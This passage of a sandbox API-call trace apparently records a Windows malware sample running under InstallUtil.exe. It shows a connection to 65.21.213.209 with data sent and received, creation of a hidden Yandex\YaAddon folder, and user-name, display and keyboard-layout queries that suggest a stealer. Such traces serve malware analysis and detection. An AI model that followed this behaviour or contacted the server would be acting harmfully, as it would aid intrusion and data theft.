hFile=0x0, dwFlags=0x2) returned 0x45a0001 [0225.686] CoTaskMemAlloc (cb=0x3ec) returned 0x613ab8 [0225.686] LoadStringW (in: hInstance=0x45a0001, uID=0x141, lpBuffer=0x613ab8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0225.687] CoTaskMemFree (pv=0x613ab8) [0225.687] FreeLibrary (hLibModule=0x45a0001) returned 1 [0225.688] RegCloseKey (hKey=0x268) returned 0x0 [0229.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", nBufferLength=0x105, lpBuffer=0x19e5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", lpFilePart=0x0) returned 0x44 [0229.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", nBufferLength=0x105, lpBuffer=0x19e578, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", lpFilePart=0x0) returned 0x44 [0229.600] GetCurrentProcess () returned 0xffffffff [0229.601] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e930 | out: TokenHandle=0x19e930*=0x2e0) returned 1 [0229.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19e40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0229.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e930 | out: lpFileInformation=0x19e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0229.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0229.607] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19e930 | out: lpFileInformation=0x19e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0229.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19e368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0229.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e85c) returned 1 [0229.610] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e8 [0229.610] GetFileType (hFile=0x2e8) returned 0x1 [0229.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e858) returned 1 [0229.610] GetFileType (hFile=0x2e8) returned 0x1 [0229.627] GetFileSize (in: hFile=0x2e8, lpFileSizeHigh=0x19e924 | out: lpFileSizeHigh=0x19e924*=0x0) returned 0x8c8f [0229.629] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e8e0, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e8e0*=0x1000, lpOverlapped=0x0) returned 1 [0229.657] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e77c, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e77c*=0x1000, lpOverlapped=0x0) returned 1 [0229.661] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e630, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e630*=0x1000, lpOverlapped=0x0) returned 1 [0229.662] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e630, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e630*=0x1000, lpOverlapped=0x0) returned 1 [0229.662] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e630, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e630*=0x1000, lpOverlapped=0x0) returned 1 [0229.663] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e568, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e568*=0x1000, lpOverlapped=0x0) returned 1 [0229.666] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e6e4, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e6e4*=0x1000, lpOverlapped=0x0) returned 1 [0229.667] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e5f8, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e5f8*=0x1000, lpOverlapped=0x0) returned 1 [0229.668] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e5f8, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e5f8*=0xc8f, lpOverlapped=0x0) returned 1 [0229.668] ReadFile (in: hFile=0x2e8, lpBuffer=0x20aa064, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e6b8, lpOverlapped=0x0 | out: lpBuffer=0x20aa064*, lpNumberOfBytesRead=0x19e6b8*=0x0, lpOverlapped=0x0) returned 1 [0229.668] CloseHandle (hObject=0x2e8) returned 1 [0229.669] GetCurrentProcess () returned 0xffffffff [0229.669] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ea58 | out: TokenHandle=0x19ea58*=0x2e8) returned 1 [0229.670] GetCurrentProcess () returned 0xffffffff [0229.670] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ea58 | out: TokenHandle=0x19ea58*=0x2ec) returned 1 [0229.671] GetCurrentProcess () returned 0xffffffff [0229.671] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e930 | out: TokenHandle=0x19e930*=0x2f0) returned 1 [0229.671] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\installutil.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e930 | out: lpFileInformation=0x19e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61dd9bf5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61dd9bf5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61dd9bf5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6)) returned 1 [0229.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", nBufferLength=0x105, lpBuffer=0x19e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", lpFilePart=0x0) returned 0x44 [0229.672] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\installutil.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19e930 | out: lpFileInformation=0x19e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61dd9bf5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61dd9bf5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61dd9bf5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb6)) returned 1 [0229.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", nBufferLength=0x105, lpBuffer=0x19e368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config", lpFilePart=0x0) returned 0x44 [0229.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19e85c) returned 1 [0229.672] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe.Config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\installutil.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f4 [0229.672] GetFileType (hFile=0x2f4) returned 0x1 [0229.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19e858) returned 1 [0229.672] GetFileType (hFile=0x2f4) returned 0x1 [0229.673] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0x19e924 | out: lpFileSizeHigh=0x19e924*=0x0) returned 0xb6 [0229.673] ReadFile (in: hFile=0x2f4, lpBuffer=0x20c245c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e8e0, lpOverlapped=0x0 | out: lpBuffer=0x20c245c*, lpNumberOfBytesRead=0x19e8e0*=0xb6, lpOverlapped=0x0) returned 1 [0229.673] ReadFile (in: hFile=0x2f4, lpBuffer=0x20c245c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x20c245c*, lpNumberOfBytesRead=0x19e7a4*=0x0, lpOverlapped=0x0) returned 1 [0229.673] CloseHandle (hObject=0x2f4) returned 1 [0229.674] GetCurrentProcess () returned 0xffffffff [0229.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ea58 | out: TokenHandle=0x19ea58*=0x2f4) returned 1 [0229.674] GetCurrentProcess () returned 0xffffffff [0229.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ea58 | out: TokenHandle=0x19ea58*=0x2f8) returned 1 [0229.688] GetCurrentProcess () returned 0xffffffff [0229.688] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e81c | out: TokenHandle=0x19e81c*=0x2fc) returned 1 [0229.762] GetCurrentProcess () returned 0xffffffff [0229.762] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e830 | out: TokenHandle=0x19e830*=0x300) returned 1 [0229.846] GetCurrentProcess () returned 0xffffffff [0229.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e048 | out: TokenHandle=0x19e048*=0x304) returned 1 [0229.870] GetCurrentProcess () returned 0xffffffff [0229.871] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e05c | out: TokenHandle=0x19e05c*=0x308) returned 1 [0234.466] GetCurrentProcess () returned 0xffffffff [0234.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef30 | out: TokenHandle=0x19ef30*=0x30c) returned 1 [0234.544] GetCurrentProcess () returned 0xffffffff [0234.544] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef44 | out: TokenHandle=0x19ef44*=0x310) returned 1 [0236.514] GetCurrentPackageId () returned 0x3d54 [0239.906] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e80c | out: phkResult=0x19e80c*=0x0) returned 0x2 [0239.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e80c | out: phkResult=0x19e80c*=0x0) returned 0x2 [0240.868] EtwEventRegister (in: ProviderId=0x2138a58, EnableCallback=0x4e10616, CallbackContext=0x0, RegHandle=0x2138a34 | out: RegHandle=0x2138a34) returned 0x0 [0242.209] CoCreateGuid (in: pguid=0x19f060 | out: pguid=0x19f060*(Data1=0xf312f71a, Data2=0x4d61, Data3=0x46d2, Data4=([0]=0x93, [1]=0x52, [2]=0xb6, [3]=0x10, [4]=0x6, [5]=0x6d, [6]=0x7a, [7]=0x4))) returned 0x0 [0242.437] CoCreateGuid (in: pguid=0x19ef90 | out: pguid=0x19ef90*(Data1=0x79a22229, Data2=0x893, Data3=0x4b14, Data4=([0]=0xa3, [1]=0x2c, [2]=0x3f, [3]=0xfb, [4]=0x8, [5]=0x1f, [6]=0x5d, [7]=0x2d))) returned 0x0 [0242.929] CoCreateGuid (in: pguid=0x19ee08 | out: pguid=0x19ee08*(Data1=0x5110fcff, Data2=0x472f, Data3=0x4818, Data4=([0]=0xa8, [1]=0xd7, [2]=0x74, [3]=0x46, [4]=0x10, [5]=0xd0, [6]=0x60, [7]=0xf4))) returned 0x0 [0243.422] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19eb18 | out: lpWSAData=0x19eb18) returned 0 [0243.433] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x340 [0243.452] setsockopt (s=0x340, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0243.452] closesocket (s=0x340) returned 0 [0243.453] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x340 [0243.456] setsockopt (s=0x340, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0243.456] closesocket (s=0x340) returned 0 [0243.466] GetCurrentProcess () returned 0xffffffff [0243.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e8cc | out: TokenHandle=0x19e8cc*=0x340) returned 1 [0243.472] GetCurrentProcess () returned 0xffffffff [0243.472] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e8e0 | out: TokenHandle=0x19e8e0*=0x344) returned 1 [0243.492] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348 [0243.498] WSAConnect (in: s=0x348, name=0x214331c*(sa_family=2, sin_port=0x80a8, sin_addr="65.21.213.209"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0243.588] setsockopt (s=0x348, level=65535, optname=4098, optval="", optlen=4) returned 0 [0243.588] setsockopt (s=0x348, level=65535, optname=4097, optval="", optlen=4) returned 0 [0243.697] setsockopt (s=0x348, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0243.708] setsockopt (s=0x348, level=65535, optname=4101, optval="\x80t\x1b", optlen=4) returned 0 [0243.709] send (s=0x348, buf=0x213bcc8*, len=40, flags=0) returned 40 [0243.725] setsockopt (s=0x348, level=65535, optname=4102, optval="3t\x1b", optlen=4) returned 0 [0243.726] recv (in: s=0x348, buf=0x2163738, len=1, flags=0 | out: buf=0x2163738*) returned 1 [0244.526] send (s=0x348, buf=0x21640db*, len=205, flags=0) returned 205 [0244.565] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 142 [0250.809] CoCreateGuid (in: pguid=0x19f05c | out: pguid=0x19f05c*(Data1=0x2c1bc57c, Data2=0xbbfd, Data3=0x455f, Data4=([0]=0xaa, [1]=0xa1, [2]=0x61, [3]=0x37, [4]=0xdf, [5]=0x5a, [6]=0x20, [7]=0x24))) returned 0x0 [0250.888] CoCreateGuid (in: pguid=0x19ef8c | out: pguid=0x19ef8c*(Data1=0x7a64895e, Data2=0x16f0, Data3=0x4407, Data4=([0]=0x9f, [1]=0x7b, [2]=0x1f, [3]=0xe8, [4]=0x98, [5]=0x7d, [6]=0x97, [7]=0x36))) returned 0x0 [0250.932] send (s=0x348, buf=0x21640db*, len=154, flags=0) returned 154 [0250.936] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 3788 [0251.133] GetCurrentProcess () returned 0xffffffff [0251.133] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e7e0 | out: TokenHandle=0x19e7e0*=0x34c) returned 1 [0251.136] GetCurrentProcess () returned 0xffffffff [0251.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e7f4 | out: TokenHandle=0x19e7f4*=0x350) returned 1 [0251.184] EtwEventRegister (in: ProviderId=0x2178748, EnableCallback=0x4e10666, CallbackContext=0x0, RegHandle=0x2178724 | out: RegHandle=0x2178724) returned 0x0 [0251.187] EtwEventSetInformation (RegHandle=0x625870, InformationClass=0x3e, EventInformation=0x2, InformationLength=0x21786e8) returned 0x0 [0251.604] CoTaskMemAlloc (cb=0x20c) returned 0x676ce0 [0251.605] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x676ce0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0251.612] CoTaskMemFree (pv=0x676ce0) [0251.612] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19ed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0251.612] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x19ee30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x32 [0251.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f28c) returned 1 [0251.614] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x19f308 | out: lpFileInformation=0x19f308*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0251.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f288) returned 1 [0251.615] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x19ee34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x32 [0251.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f21c) returned 1 [0251.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x19f298 | out: lpFileInformation=0x19f298*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0251.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f218) returned 1 [0251.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f21c) returned 1 [0251.615] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x19f298 | out: lpFileInformation=0x19f298*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0251.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f218) returned 1 [0251.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f21c) returned 1 [0251.616] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex"), fInfoLevelId=0x0, lpFileInformation=0x19f298 | out: lpFileInformation=0x19f298*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0251.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f218) returned 1 [0251.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f21c) returned 1 [0251.616] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x19f298 | out: lpFileInformation=0x19f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0251.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f218) returned 1 [0251.616] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex"), lpSecurityAttributes=0x0) returned 1 [0251.620] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yaaddon"), lpSecurityAttributes=0x0) returned 1 [0251.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe", nBufferLength=0x105, lpBuffer=0x19edf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe", lpFilePart=0x0) returned 0x3d [0253.503] GdiplusStartup (in: token=0x50874f8, input=0x19e808, output=0x19e858 | out: token=0x50874f8, output=0x19e858) returned 0x0 [0253.531] GdipCreateFromHWND (hwnd=0x0, graphics=0x19f2f4) returned 0x0 [0253.534] GdipGetDC (graphics=0x52a1f08, hdc=0x19f304) returned 0x0 [0253.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x19f2a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32\x9a\x12\x05\x89\x871\x86 «ðkhö\x19", lpUsedDefaultChar=0x0) returned 5 [0253.547] LoadLibraryA (lpLibFileName="gdi32") returned 0x771b0000 [0253.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x19f29c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCaps\x9b\x12\x05\x89\x871\x86 «ðkhö\x19", lpUsedDefaultChar=0x0) returned 13 [0253.552] GetProcAddress (hModule=0x771b0000, lpProcName="GetDeviceCaps") returned 0x77230fe0 [0253.561] GetDeviceCaps (hdc=0x1f010704, index=10) returned 900 [0253.561] GetDeviceCaps (hdc=0x1f010704, index=117) returned 900 [0253.563] GdipReleaseDC (graphics=0x52a1f08, hdc=0x1f010704) returned 0x0 [0253.565] GdipDeleteGraphics (graphics=0x52a1f08) returned 0x0 [0253.595] GetSystemMetrics (nIndex=80) returned 1 [0253.608] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4e107ce, dwData=0x0) returned 1 [0253.613] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x19f0b4 | out: lpmi=0x19f0b4) returned 1 [0253.615] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x3d0109d1 [0253.620] GetDeviceCaps (hdc=0x3d0109d1, index=12) returned 32 [0253.620] GetDeviceCaps (hdc=0x3d0109d1, index=14) returned 1 [0253.621] DeleteDC (hdc=0x3d0109d1) returned 1 [0253.628] GetProcessWindowStation () returned 0xd0 [0253.629] GetUserObjectInformationA (in: hObj=0xd0, nIndex=1, pvInfo=0x21b4a18, nLength=0xc, lpnLengthNeeded=0x19f294 | out: pvInfo=0x21b4a18, lpnLengthNeeded=0x19f294) returned 1 [0253.632] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0254.089] CoCreateGuid (in: pguid=0x19e3a8 | out: pguid=0x19e3a8*(Data1=0xca62612f, Data2=0xcea7, Data3=0x4440, Data4=([0]=0xb0, [1]=0xd2, [2]=0xc, [3]=0x13, [4]=0x3c, [5]=0xb6, [6]=0x44, [7]=0x49))) returned 0x0 [0254.504] GetUserNameW (in: lpBuffer=0x19f118, pcbBuffer=0x19f390 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f390) returned 1 [0254.524] GetCurrentProcess () returned 0xffffffff [0254.524] GetCurrentThread () returned 0xfffffffe [0254.524] GetCurrentProcess () returned 0xffffffff [0254.524] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f34c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f34c*=0x3b4) returned 1 [0254.525] GetCurrentThreadId () returned 0xafc [0254.526] OleInitialize (pvReserved=0x0) returned 0x80010106 [0254.531] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0254.541] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74580000 [0254.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x19f2f8, 